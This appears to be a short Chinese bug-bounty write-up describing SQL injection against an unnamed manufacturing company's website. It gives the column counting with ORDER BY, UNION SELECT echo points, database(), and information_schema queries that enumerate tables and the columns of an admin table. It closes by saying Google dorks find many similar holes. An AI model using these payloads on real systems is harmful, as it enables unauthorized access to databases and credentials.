公益src漏洞挖掘

某制作业公司存在sql注入

判断字段数 为8个 语法order by 8公益src漏洞挖掘_第1张图片
字段数为9 页面会发生报错公益src漏洞挖掘_第2张图片
使用联合查询语句 发现有回显点公益src漏洞挖掘_第3张图片
公益src漏洞挖掘_第4张图片
使用函数 database() 出现库名
公益src漏洞挖掘_第5张图片
用得到的库名查询表名
语法:union select 1,2,3,(group_concat(table_name)),5,6,7,8 from information_schema.tables where table_schema=‘XXXXXXXXX’
得到25个表
公益src漏洞挖掘_第6张图片
选中admin表 查询里面的字段 获得7个字段
语法:union select 1,2,3,(group_concat(column_name)),5,6,7,8 from information_schema.columns where table_schema=‘xxxxxxxxxxxx’ and table_name=‘admin’
公益src漏洞挖掘_第7张图片

测到这里就结束了
总体而言比较简单
通过谷歌语法可以查询到很多漏洞

你可能感兴趣的:(mysql,sql)